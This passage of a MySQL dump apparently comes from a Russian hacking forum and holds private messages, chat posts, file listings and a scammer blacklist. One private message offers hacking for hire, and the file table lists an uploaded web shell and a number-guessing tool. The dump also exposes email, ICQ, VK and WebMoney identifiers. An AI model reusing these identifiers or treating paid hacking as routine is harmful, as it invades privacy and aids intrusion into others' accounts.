INSERT INTO letters VALUES("557","94","96","Всем. У тебя мыло от акк 2наме.нет с доменом wapfm.ru есть? Я опять данные забыл :D А домен скоро продлевать...","1436529661","1","o","0","");
INSERT INTO letters VALUES("558","94","96",";D","1436529766","1","i","0","");
INSERT INTO letters VALUES("559","96","94",";D","1436529766","1","o","0","");
INSERT INTO letters VALUES("560","96","94","Перенеси на мой акк логин ZeK мыло otwap.ru@bk.ru<br />А то каждый раз мозг тебе ипать буду :D<br />Там домены передавать можно","1436529952","1","i","0","");
INSERT INTO letters VALUES("561","94","96","Перенеси на мой акк логин ZeK мыло otwap.ru@bk.ru<br />А то каждый раз мозг тебе ипать буду :D<br />Там домены передавать можно","1436529952","1","o","0","");
INSERT INTO letters VALUES("567","94","96","Напиши ему что-бы написал мне в асю 10361141","1436610498","1","o","0","");
INSERT INTO letters VALUES("568","94","96","Ок","1436638576","1","i","0","");
INSERT INTO letters VALUES("569","96","94","Ок","1436638576","1","o","0","");
INSERT INTO letters VALUES("570","117","94","Как вмид подтвердить?","1436765508","1","i","0","");
INSERT INTO letters VALUES("571","94","117","Как вмид подтвердить?","1436765508","1","o","0","");
INSERT INTO letters VALUES("572","96","94","Почему с этого акк сидиш ты?","1436767251","1","i","0","");
INSERT INTO letters VALUES("573","94","96","Почему с этого акк сидиш ты?","1436767251","1","o","0","");
INSERT INTO letters VALUES("574","94","96","Не понял?","1436770211","1","i","0","");
INSERT INTO letters VALUES("575","96","94","Не понял?","1436770211","1","o","0","");
INSERT INTO letters VALUES("576","94","117","Я подтвердил","1436770238","1","i","0","");
INSERT INTO letters VALUES("577","117","94","Я подтвердил","1436770238","1","o","0","");
INSERT INTO letters VALUES("578","120","94","меняй дизайн <span style=\"color: #FF0000;\"><b>[censored]</b></span>ня это всё","1436868702","1","i","0","");
INSERT INTO letters VALUES("591","94","155","Привет, нужен взлом?Тогдаето к нам...Что нужно взломать? И оплата?","1437847061","0","i","0","");
INSERT INTO letters VALUES("581","120","94","Ты кто?","1436868817","1","o","0","");
INSERT INTO letters VALUES("582","120","94","Франк Соркут","1436872094","1","i","0","");
INSERT INTO letters VALUES("585","120","94","В вк отпиши vk.com/x_b_I_t","1436872176","1","o","0","");
INSERT INTO letters VALUES("586","120","94","Зачем?","1436872533","1","i","0","");
INSERT INTO letters VALUES("590","0","94","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user150\">Betz9</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=94\">плюс</a>!","1437802029","1","i","0","");
INSERT INTO letters VALUES("589","120","94","Какой дизайн ставить?","1436874417","1","o","0","");
INSERT INTO letters VALUES("592","155","94","Привет, нужен взлом?Тогдаето к нам...Что нужно взломать? И оплата?","1437847061","1","o","0","");
INSERT INTO letters VALUES("593","94","160","тест","1438148780","0","i","0","mail/file_952400.jpg");
INSERT INTO letters VALUES("594","160","94","тест","1438148780","1","o","0","mail/file_952400.jpg");
DROP TABLE IF EXISTS `loads_f`;
CREATE TABLE `loads_f` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`url` char(100) NOT NULL,
`time` int(11) NOT NULL,
`clicks` int(11) NOT NULL DEFAULT '0',
`author` int(11) NOT NULL,
`title` char(100) NOT NULL,
`info` text NOT NULL,
`cat` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=44 DEFAULT CHARSET=utf8;
INSERT INTO loads_f VALUES("14","files/81317file_205784.zip","1368624204","0","4","file_205784.zip","это отличный шелл с возможностью ставить пароль) пароль(root)","0");
INSERT INTO loads_f VALUES("35","files/1601522077number.zip","1369061073","0","4","22077number.zip","Подбор 4-ех цифер номер. Есть ошибки.","0");
DROP TABLE IF EXISTS `loads_komm`;
CREATE TABLE `loads_komm` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `loads_r`;
CREATE TABLE `loads_r` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(50) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `mark`;
CREATE TABLE `mark` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`who` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `mesage`;
CREATE TABLE `mesage` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` varchar(10) NOT NULL DEFAULT '',
`msg` text NOT NULL,
`private` smallint(2) NOT NULL DEFAULT '0',
`time` int(11) NOT NULL DEFAULT '0',
`komu` int(11) NOT NULL DEFAULT '0',
`user` varchar(15) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=999561 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
INSERT INTO mesage VALUES("315609","1","<span style=\"color:#FF0000;\"><u><b>тест</b></u></span>","0","1420229782","0","Senusert");
INSERT INTO mesage VALUES("561213","6","RE RE","0","1420284020","0","Veteran");
INSERT INTO mesage VALUES("652652","7","И тишина…","0","1427005184","0","Nravo");
DROP TABLE IF EXISTS `message`;
CREATE TABLE `message` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` varchar(10) NOT NULL DEFAULT '',
`msg` text NOT NULL,
`private` smallint(2) NOT NULL DEFAULT '0',
`time` int(11) NOT NULL DEFAULT '0',
`komu` int(11) NOT NULL DEFAULT '0',
`user` varchar(15) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=999561 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
INSERT INTO message VALUES("206019","1","<span style=\"color:#FF0000;\"><u><b>Ну вот и снова онлайн 27чел))</b></u></span>","0","1390657377","0","xkat ™");
INSERT INTO message VALUES("198701","489","круто че;)","0","1390669028","0","Trikz");
INSERT INTO message VALUES("861518","1","TECT http://hackbit.net/hack_urok/","0","1390720203","0","xkat ™");
INSERT INTO message VALUES("631673","1","nnn","0","1390721799","0","xkat ™");
INSERT INTO message VALUES("362343","1172","hh","0","1390722714","0","Ruslan");
INSERT INTO message VALUES("217097","2","Дивы закрой *данет*","0","1390729252","0","ЗэК");
INSERT INTO message VALUES("569212","1135","o.O","0","1390747345","0","ZveroBoy");
INSERT INTO message VALUES("823586","9","[IMG]http://http://http:-)/c9rx97qxnh:-)gif[/IMG]","0","1390824074","0","Creespo");
INSERT INTO message VALUES("176255","32400","xkat™,","0","1390922632","1","Darks");
DROP TABLE IF EXISTS `moshenniki`;
CREATE TABLE `moshenniki` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`nick` varchar(50) NOT NULL,
`info` text NOT NULL,
`wmr` varchar(12) NOT NULL,
`wmid` varchar(12) NOT NULL,
`src` varchar(200) NOT NULL,
`us` int(11) NOT NULL,
`mod` int(1) NOT NULL DEFAULT '0',
`time` varchar(30) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=30 DEFAULT CHARSET=utf8;
INSERT INTO moshenniki VALUES("3","Пиарщик","http://bymas.ru/forum/topic/70690/page","409522768419","611093425337","screen/HACKBIT.NET_21_980592.jpg","21","1","17.03.2015 18:47:56");
INSERT INTO moshenniki VALUES("4","Саня","http://stopked.ru/ked/49","107527572969","698926002551","screen/HACKBIT.NET_21_836796.jpg","21","1","17.03.2015 21:18:38");
INSERT INTO moshenniki VALUES("5","Kisaragi","http://stopked.ru/ked/11","414332822486","189619722558","screen/HACKBIT.NET_21_676669.jpg","21","1","17.03.2015 21:19:58");
INSERT INTO moshenniki VALUES("6","[T]eRme","http://bymas.ru/user/arb_list.php?user_id=12320","821332655287","247318842030","screen/HACKBIT.NET_21_255751.png","21","1","17.03.2015 21:23:40");
INSERT INTO moshenniki VALUES("7","Kybik-Pybik","http://bymas.ru/forum/viewtopic.php?topic_id=69698&start=0","369840213637","953590371966","screen/HACKBIT.NET_21_886137.png","21","1","17.03.2015 21:25:01");
INSERT INTO moshenniki VALUES("8","dreamer","http://bymas.ru/forum/topic/69492/page10","399594750669","853457779947","screen/HACKBIT.NET_21_134786.png","21","1","17.03.2015 21:25:54");
INSERT INTO moshenniki VALUES("9","259096916","http://bymas.ru/kidala/detail.php?user_id=13744","139075073167","328969395650","screen/HACKBIT.NET_21_825991.png","21","1","17.03.2015 21:28:19");
INSERT INTO moshenniki VALUES("10","ByGreshnik","http://bymas.ru/forum/topic/69669/page","346272501990","150689359608","screen/HACKBIT.NET_21_582565.png","21","1","17.03.2015 21:39:09");
INSERT INTO moshenniki VALUES("11","Zloy._.","http://bymas.ru/forum/topic/69051","390374188680","167438174647","screen/HACKBIT.NET_21_194360.png","21","1","17.03.2015 21:40:14");
INSERT INTO moshenniki VALUES("12","Flash","http://bymas.ru/forum/topic/69248","375884768245","882540504308","screen/HACKBIT.NET_21_749859.png","21","1","17.03.2015 21:41:13");
INSERT INTO moshenniki VALUES("13","nesvoy","http://bymas.ru/forum/topic/69218","414689328481","211375203724","screen/HACKBIT.NET_21_792663.png","21","1","17.03.2015 21:42:47");
INSERT INTO moshenniki VALUES("14","PaCToMaH","http://bymas.ru/forum/topic/68760","609280880286","315368200528","screen/HACKBIT.NET_21_493643.png","21","1","17.03.2015 21:44:06");
INSERT INTO moshenniki VALUES("15","boy_street","http://bymas.ru/forum/topic/68760","172173109534","404834914961","screen/HACKBIT.NET_21_751423.png","21","1","17.03.2015 21:45:41");
INSERT INTO moshenniki VALUES("16","Graf Drakyla","http://bymas.ru/forum/topic/68268","165865428658","405081194350","screen/HACKBIT.NET_21_780143.png","21","1","17.03.2015 21:46:32");
INSERT INTO moshenniki VALUES("17","Vestaleandr","http://bymas.ru/forum/topic/67910/page10","817394462230","280797695019","screen/HACKBIT.NET_21_658484.png","21","1","17.03.2015 21:47:29");
INSERT INTO moshenniki VALUES("18","FomKa","http://bymas.ru/forum/topic/68273","259397802462","294875619412","screen/HACKBIT.NET_21_854388.png","21","1","17.03.2015 21:48:43");
INSERT INTO moshenniki VALUES("19","F_e_r_r_a_r_i","http://bymas.ru/user/arb_list.php?user_id=7017","363169303075","425352566916","screen/HACKBIT.NET_21_428615.png","21","1","17.03.2015 21:49:58");
INSERT INTO moshenniki VALUES("20","The_Game","http://bymas.ru/forum/topic/67991","349688377571","194393712909","screen/HACKBIT.NET_21_454173.png","21","1","17.03.2015 21:50:44");
INSERT INTO moshenniki VALUES("21","enotik","http://bymas.ru/forum/topic/67150/page0","394809388892","291637331510","screen/HACKBIT.NET_21_123168.png","21","1","17.03.2015 21:52:35");
INSERT INTO moshenniki VALUES("22","Remix.DeD","http://bymas.ru/forum/topic/65835/page","167213134040","651465213849","screen/HACKBIT.NET_21_1069894.png","21","1","17.03.2015 21:53:38");
INSERT INTO moshenniki VALUES("23","LenovoB590","http://bymas.ru/forum/topic/66011/page","235663152105","300979189512","screen/HACKBIT.NET_21_1038279.png","21","1","17.03.2015 21:54:58");
INSERT INTO moshenniki VALUES("24","Maratos668","http://bymas.ru/forum/topic/65860","439216961084","139737609967","screen/HACKBIT.NET_21_324647.png","21","1","17.03.2015 21:55:47");
INSERT INTO moshenniki VALUES("25","OPTIMIST","http://bymas.ru/forum/topic/65871","257268440601","363372010961","screen/HACKBIT.NET_21_334669.png","21","1","17.03.2015 21:56:44");
INSERT INTO moshenniki VALUES("26","278345533","http://bymas.ru/forum/topic/65400/page","302043667089","169800087616","screen/HACKBIT.NET_21_519551.png","21","1","17.03.2015 21:57:46");
INSERT INTO moshenniki VALUES("27","codmwnew","http://bymas.ru/forum/topic/65169","252334821844","191879048004","screen/HACKBIT.NET_21_728150.png","21","1","17.03.2015 21:58:35");
INSERT INTO moshenniki VALUES("28","RotManS","http://bymas.ru/kidala/detail.php?user_id=11675","129477619520","161264467704","screen/HACKBIT.NET_21_1012631.png","21","1","17.03.2015 21:59:35");
INSERT INTO moshenniki VALUES("29","Alivel","мульт Dark Seer","109210395560","667888974180","screen/HACKBIT.NET_21_1071129.png","21","1","17.03.2015 22:00:31");
DROP TABLE IF EXISTS `naryshenie`;
CREATE TABLE `naryshenie` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) DEFAULT NULL,
`msg` text,
`val` int(11) DEFAULT NULL,
`date` int(11) DEFAULT NULL,
`who` int(11) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
INSERT INTO naryshenie VALUES("1","18","Реклама сторонних проектов, оффтоп","0","1426445641","1");
INSERT INTO naryshenie VALUES("2","18","2.0 Категорически запрещаются открытые ссылки ВО ВСЕХ РАЗДЕЛАХ форума. Скрывайте за<br />тегами [url=http://ссылка]название ссылки[/url] (исключением вляются внутренние ссылки).<br />[16 часов]","0","1426445814","27");
DROP TABLE IF EXISTS `news`;
CREATE TABLE `news` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(255) NOT NULL,
`content` text NOT NULL,
`edit` char(20) NOT NULL,
`look` int(11) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL DEFAULT '0',
`author` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=35 DEFAULT CHARSET=utf8;
INSERT INTO news VALUES("34","Открытие сайта","После долгого перерыва в работе, сайт сново восстановлен","","74","1420213817","");
DROP TABLE IF EXISTS `newscomm`;
CREATE TABLE `newscomm` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`id_new` int(11) NOT NULL DEFAULT '0',
`date` char(20) NOT NULL,
`msg` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=268 DEFAULT CHARSET=utf8;
INSERT INTO newscomm VALUES("258","27","34","15.03.15 17:08","этоже отлично! удачи в развитие вам!");
INSERT INTO newscomm VALUES("259","7","34","15.03.15 20:20","Норм");
INSERT INTO newscomm VALUES("260","41","34","15.03.15 23:25","Хах это совершенно другой сайт... Бред несешь...");
INSERT INTO newscomm VALUES("261","51","34","16.03.15 08:59","Норм чо");
INSERT INTO newscomm VALUES("262","51","34","16.03.15 08:59","[i][b] TheAlex[/i][/b], А ты всё тот же, упырёныш");
INSERT INTO newscomm VALUES("263","30","34","16.03.15 11:10","Отлично будет )");
INSERT INTO newscomm VALUES("267","101","34","25.07.15 22:50","Отлично дерзайте дальше!");
INSERT INTO newscomm VALUES("265","30","34","16.03.15 17:47","[i][b] TheAlex[/i][/b], Цензура! ни есть хорошо");
INSERT INTO newscomm VALUES("266","65","34","19.03.15 15:48","с возвращением");
DROP TABLE IF EXISTS `rating_files`;
CREATE TABLE `rating_files` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`like` smallint(1) NOT NULL DEFAULT '0',
`dlike` smallint(1) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=186 DEFAULT CHARSET=utf8;
INSERT INTO rating_files VALUES("8","3","1","0","24");
INSERT INTO rating_files VALUES("9","634","1","0","24");
INSERT INTO rating_files VALUES("7","1","1","0","24");
INSERT INTO rating_files VALUES("10","569","1","0","24");
INSERT INTO rating_files VALUES("11","41","1","0","24");
INSERT INTO rating_files VALUES("12","646","1","0","24");
INSERT INTO rating_files VALUES("13","647","1","0","24");
INSERT INTO rating_files VALUES("14","657","1","0","24");
INSERT INTO rating_files VALUES("15","667","1","0","24");
INSERT INTO rating_files VALUES("16","294","1","0","24");
INSERT INTO rating_files VALUES("17","666","1","0","24");
INSERT INTO rating_files VALUES("18","652","1","0","25");
INSERT INTO rating_files VALUES("19","390","1","0","25");
INSERT INTO rating_files VALUES("20","4","1","0","24");
INSERT INTO rating_files VALUES("21","1","1","0","25");
INSERT INTO rating_files VALUES("57","653","1","0","45");
INSERT INTO rating_files VALUES("23","390","1","0","26");
INSERT INTO rating_files VALUES("24","390","1","0","29");
INSERT INTO rating_files VALUES("56","457","1","0","43");
INSERT INTO rating_files VALUES("26","390","1","0","33");
INSERT INTO rating_files VALUES("27","390","1","0","30");
INSERT INTO rating_files VALUES("28","390","1","0","34");
INSERT INTO rating_files VALUES("29","648","1","0","34");
INSERT INTO rating_files VALUES("30","41","1","0","34");
INSERT INTO rating_files VALUES("31","642","1","0","34");
INSERT INTO rating_files VALUES("95","934","1","0","75");
INSERT INTO rating_files VALUES("33","294","1","0","33");
INSERT INTO rating_files VALUES("34","648","1","0","33");
INSERT INTO rating_files VALUES("35","390","1","0","35");
INSERT INTO rating_files VALUES("36","303","1","0","34");
INSERT INTO rating_files VALUES("37","1","1","0","35");
INSERT INTO rating_files VALUES("38","569","1","0","35");
INSERT INTO rating_files VALUES("39","569","1","0","33");
INSERT INTO rating_files VALUES("40","45","1","0","34");
INSERT INTO rating_files VALUES("41","687","1","0","24");
INSERT INTO rating_files VALUES("42","593","1","0","34");
INSERT INTO rating_files VALUES("43","1","1","0","37");
INSERT INTO rating_files VALUES("55","457","1","0","42");
INSERT INTO rating_files VALUES("45","470","1","0","37");
INSERT INTO rating_files VALUES("46","703","1","0","34");
INSERT INTO rating_files VALUES("58","4","1","0","45");
INSERT INTO rating_files VALUES("48","573","1","0","44");
INSERT INTO rating_files VALUES("49","1","1","0","44");
INSERT INTO rating_files VALUES("50","371","1","0","44");
INSERT INTO rating_files VALUES("51","97","1","0","41");
INSERT INTO rating_files VALUES("52","767","0","1","41");
INSERT INTO rating_files VALUES("53","726","0","1","44");
INSERT INTO rating_files VALUES("54","683","1","0","41");
INSERT INTO rating_files VALUES("59","573","1","0","45");
INSERT INTO rating_files VALUES("60","593","1","0","33");
INSERT INTO rating_files VALUES("61","470","1","0","33");
INSERT INTO rating_files VALUES("62","531","1","0","46");
INSERT INTO rating_files VALUES("63","811","1","0","46");
INSERT INTO rating_files VALUES("64","390","1","0","46");
INSERT INTO rating_files VALUES("65","825","1","0","45");
INSERT INTO rating_files VALUES("66","489","1","0","47");
INSERT INTO rating_files VALUES("67","432","1","0","47");
INSERT INTO rating_files VALUES("68","823","1","0","47");
INSERT INTO rating_files VALUES("69","573","1","0","47");
INSERT INTO rating_files VALUES("70","531","1","0","33");
INSERT INTO rating_files VALUES("71","3","1","0","48");
INSERT INTO rating_files VALUES("142","325","1","0","144");
INSERT INTO rating_files VALUES("73","390","1","0","58");
INSERT INTO rating_files VALUES("75","785","0","1","24");
INSERT INTO rating_files VALUES("76","708","1","0","34");
INSERT INTO rating_files VALUES("77","3","1","0","73");
INSERT INTO rating_files VALUES("78","657","1","0","68");
INSERT INTO rating_files VALUES("79","837","1","0","68");
INSERT INTO rating_files VALUES("80","1","1","0","73");
INSERT INTO rating_files VALUES("81","785","0","1","73");
INSERT INTO rating_files VALUES("82","390","1","0","79");
INSERT INTO rating_files VALUES("83","470","1","0","87");
INSERT INTO rating_files VALUES("84","97","1","0","91");
INSERT INTO rating_files VALUES("87","390","1","0","93");
INSERT INTO rating_files VALUES("86","1","1","0","91");
INSERT INTO rating_files VALUES("88","901","1","0","94");
INSERT INTO rating_files VALUES("89","457","0","1","94");
INSERT INTO rating_files VALUES("90","573","1","0","95");
INSERT INTO rating_files VALUES("91","1","1","0","95");
INSERT INTO rating_files VALUES("92","3","1","0","105");
INSERT INTO rating_files VALUES("94","934","1","0","79");
INSERT INTO rating_files VALUES("96","934","1","0","26");
INSERT INTO rating_files VALUES("97","934","1","0","24");
INSERT INTO rating_files VALUES("98","934","0","1","80");
INSERT INTO rating_files VALUES("99","955","0","1","126");
INSERT INTO rating_files VALUES("100","647","1","0","128");
INSERT INTO rating_files VALUES("101","363","0","1","126");
INSERT INTO rating_files VALUES("102","2","1","0","131");
INSERT INTO rating_files VALUES("103","390","1","0","41");
INSERT INTO rating_files VALUES("104","489","1","0","131");
INSERT INTO rating_files VALUES("105","390","1","0","132");
INSERT INTO rating_files VALUES("106","920","0","1","85");
INSERT INTO rating_files VALUES("107","363","1","0","132");
INSERT INTO rating_files VALUES("108","1030","1","0","48");
INSERT INTO rating_files VALUES("109","392","1","0","91");
INSERT INTO rating_files VALUES("110","489","1","0","143");
INSERT INTO rating_files VALUES("111","785","1","0","145");
INSERT INTO rating_files VALUES("112","489","1","0","146");
INSERT INTO rating_files VALUES("113","371","1","0","86");
INSERT INTO rating_files VALUES("114","968","1","0","47");
INSERT INTO rating_files VALUES("115","968","1","0","145");
INSERT INTO rating_files VALUES("116","955","1","0","155");
INSERT INTO rating_files VALUES("117","968","1","0","132");
INSERT INTO rating_files VALUES("118","1170","1","0","79");
INSERT INTO rating_files VALUES("119","1177","1","0","151");
INSERT INTO rating_files VALUES("120","1186","1","0","131");
INSERT INTO rating_files VALUES("121","639","1","0","157");
INSERT INTO rating_files VALUES("122","363","1","0","46");
INSERT INTO rating_files VALUES("123","710","0","1","157");
INSERT INTO rating_files VALUES("124","2","1","0","160");
INSERT INTO rating_files VALUES("125","3","1","0","160");
INSERT INTO rating_files VALUES("126","1201","0","1","163");
INSERT INTO rating_files VALUES("127","2","1","0","164");
INSERT INTO rating_files VALUES("128","3","1","0","164");
INSERT INTO rating_files VALUES("129","573","1","0","164");
INSERT INTO rating_files VALUES("130","1152","1","0","160");
INSERT INTO rating_files VALUES("131","1076","1","0","164");
INSERT INTO rating_files VALUES("132","1201","1","0","160");
INSERT INTO rating_files VALUES("133","1076","1","0","160");
INSERT INTO rating_files VALUES("134","363","1","0","160");
INSERT INTO rating_files VALUES("135","363","1","0","163");
INSERT INTO rating_files VALUES("136","891","1","0","160");
INSERT INTO rating_files VALUES("137","1236","1","0","136");
INSERT INTO rating_files VALUES("138","1248","1","0","160");
INSERT INTO rating_files VALUES("139","1201","0","1","165");
INSERT INTO rating_files VALUES("140","828","0","1","165");
INSERT INTO rating_files VALUES("141","920","1","0","164");
INSERT INTO rating_files VALUES("143","611","0","1","160");
INSERT INTO rating_files VALUES("144","1149","1","0","144");
INSERT INTO rating_files VALUES("145","390","1","0","72");
INSERT INTO rating_files VALUES("146","821","0","1","74");
INSERT INTO rating_files VALUES("147","1349","1","0","150");
INSERT INTO rating_files VALUES("148","1350","1","0","105");
INSERT INTO rating_files VALUES("149","1350","1","0","160");
INSERT INTO rating_files VALUES("150","1305","1","0","86");
INSERT INTO rating_files VALUES("151","573","1","0","167");
INSERT INTO rating_files VALUES("152","968","1","0","167");
INSERT INTO rating_files VALUES("153","303","1","0","48");
INSERT INTO rating_files VALUES("154","363","0","1","65");
INSERT INTO rating_files VALUES("155","363","1","0","37");
INSERT INTO rating_files VALUES("156","1376","1","0","168");
INSERT INTO rating_files VALUES("157","350","1","0","168");
INSERT INTO rating_files VALUES("158","1399","1","0","86");
INSERT INTO rating_files VALUES("159","390","1","0","168");
INSERT INTO rating_files VALUES("160","1","1","0","160");
INSERT INTO rating_files VALUES("161","32223","1","0","168");
INSERT INTO rating_files VALUES("162","390","1","0","160");
INSERT INTO rating_files VALUES("163","1201","1","0","167");
INSERT INTO rating_files VALUES("164","1201","1","0","86");
INSERT INTO rating_files VALUES("165","1201","1","0","80");
INSERT INTO rating_files VALUES("166","1201","1","0","78");
INSERT INTO rating_files VALUES("167","363","0","1","69");
INSERT INTO rating_files VALUES("168","1375","1","0","168");
INSERT INTO rating_files VALUES("169","852","1","0","78");
INSERT INTO rating_files VALUES("170","1201","0","1","169");
INSERT INTO rating_files VALUES("171","333","0","1","166");
INSERT INTO rating_files VALUES("172","531","1","0","168");
INSERT INTO rating_files VALUES("173","1254","0","1","166");
INSERT INTO rating_files VALUES("174","32251","1","0","24");
INSERT INTO rating_files VALUES("175","784","1","0","160");
INSERT INTO rating_files VALUES("176","32257","1","0","170");
INSERT INTO rating_files VALUES("177","1","1","0","168");
INSERT INTO rating_files VALUES("178","432","1","0","170");
INSERT INTO rating_files VALUES("179","32382","0","1","65");
INSERT INTO rating_files VALUES("180","32356","1","0","174");
INSERT INTO rating_files VALUES("181","32400","1","0","80");
INSERT INTO rating_files VALUES("182","32417","1","0","80");
INSERT INTO rating_files VALUES("183","774","1","0","175");
INSERT INTO rating_files VALUES("184","120","0","1","36");
INSERT INTO rating_files VALUES("185","94","1","0","36");
DROP TABLE IF EXISTS `rating_foto`;
CREATE TABLE `rating_foto` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`good` int(11) NOT NULL DEFAULT '0',
`bad` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`komu` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
INSERT INTO rating_foto VALUES("1","3","1","0","107","303");
INSERT INTO rating_foto VALUES("2","3","1","0","111","1");
INSERT INTO rating_foto VALUES("3","271","1","0","111","1");
INSERT INTO rating_foto VALUES("4","271","1","0","131","511");
DROP TABLE IF EXISTS `rating_gazeta`;
CREATE TABLE `rating_gazeta` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`like` smallint(1) NOT NULL DEFAULT '0',
`dlike` smallint(1) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=61 DEFAULT CHARSET=utf8;
INSERT INTO rating_gazeta VALUES("1","30","1","0","48");
INSERT INTO rating_gazeta VALUES("2","7","1","0","48");
INSERT INTO rating_gazeta VALUES("3","3","1","0","70");
INSERT INTO rating_gazeta VALUES("4","1","1","0","82");
INSERT INTO rating_gazeta VALUES("5","1","1","0","81");
INSERT INTO rating_gazeta VALUES("6","1","1","0","80");
INSERT INTO rating_gazeta VALUES("7","1","1","0","69");
INSERT INTO rating_gazeta VALUES("8","1","1","0","85");
INSERT INTO rating_gazeta VALUES("9","1","1","0","86");
INSERT INTO rating_gazeta VALUES("10","1","1","0","89");
INSERT INTO rating_gazeta VALUES("11","1","1","0","91");
INSERT INTO rating_gazeta VALUES("12","1","1","0","93");
INSERT INTO rating_gazeta VALUES("13","470","1","0","144");
INSERT INTO rating_gazeta VALUES("14","470","1","0","82");
INSERT INTO rating_gazeta VALUES("15","569","1","0","144");
INSERT INTO rating_gazeta VALUES("16","593","1","0","144");
INSERT INTO rating_gazeta VALUES("17","642","1","0","93");
INSERT INTO rating_gazeta VALUES("18","569","1","0","146");
INSERT INTO rating_gazeta VALUES("19","3","1","0","155");
INSERT INTO rating_gazeta VALUES("20","470","1","0","155");
INSERT INTO rating_gazeta VALUES("21","4","1","0","144");
INSERT INTO rating_gazeta VALUES("22","4","1","0","159");
INSERT INTO rating_gazeta VALUES("23","573","1","0","159");
INSERT INTO rating_gazeta VALUES("24","470","1","0","159");
INSERT INTO rating_gazeta VALUES("25","371","1","0","86");
INSERT INTO rating_gazeta VALUES("26","651","1","0","160");
INSERT INTO rating_gazeta VALUES("27","649","1","0","160");
INSERT INTO rating_gazeta VALUES("28","457","1","0","160");
INSERT INTO rating_gazeta VALUES("29","4","1","0","160");
INSERT INTO rating_gazeta VALUES("30","651","1","0","161");
INSERT INTO rating_gazeta VALUES("31","531","1","0","164");
INSERT INTO rating_gazeta VALUES("32","3","1","0","166");
INSERT INTO rating_gazeta VALUES("33","573","1","0","166");
INSERT INTO rating_gazeta VALUES("34","114","1","0","166");
INSERT INTO rating_gazeta VALUES("35","774","1","0","161");
INSERT INTO rating_gazeta VALUES("36","934","1","0","158");
INSERT INTO rating_gazeta VALUES("37","774","1","0","155");
INSERT INTO rating_gazeta VALUES("38","1030","1","0","167");
INSERT INTO rating_gazeta VALUES("39","538","1","0","116");
INSERT INTO rating_gazeta VALUES("40","1086","1","0","160");
INSERT INTO rating_gazeta VALUES("41","107","1","0","158");
INSERT INTO rating_gazeta VALUES("42","798","1","0","160");
INSERT INTO rating_gazeta VALUES("43","490","1","0","158");
INSERT INTO rating_gazeta VALUES("44","325","1","0","166");
INSERT INTO rating_gazeta VALUES("45","10","1","0","166");
INSERT INTO rating_gazeta VALUES("46","828","1","0","142");
INSERT INTO rating_gazeta VALUES("47","1247","1","0","166");
INSERT INTO rating_gazeta VALUES("48","1335","1","0","160");
INSERT INTO rating_gazeta VALUES("49","1375","1","0","135");
INSERT INTO rating_gazeta VALUES("50","1","1","0","166");
INSERT INTO rating_gazeta VALUES("51","32240","1","0","104");
INSERT INTO rating_gazeta VALUES("52","32274","1","0","82");
INSERT INTO rating_gazeta VALUES("53","32300","1","0","161");
INSERT INTO rating_gazeta VALUES("54","32300","1","0","69");
INSERT INTO rating_gazeta VALUES("55","200","1","0","170");
INSERT INTO rating_gazeta VALUES("56","538","1","0","170");
INSERT INTO rating_gazeta VALUES("57","1","1","0","158");
INSERT INTO rating_gazeta VALUES("58","72","0","1","144");
INSERT INTO rating_gazeta VALUES("59","72","0","1","158");
INSERT INTO rating_gazeta VALUES("60","72","0","1","160");
DROP TABLE IF EXISTS `rating_hist`;
CREATE TABLE `rating_hist` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`msg` char(255) NOT NULL,
`val` smallint(1) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL DEFAULT '0',
`who` int(11) NOT NULL DEFAULT '0',
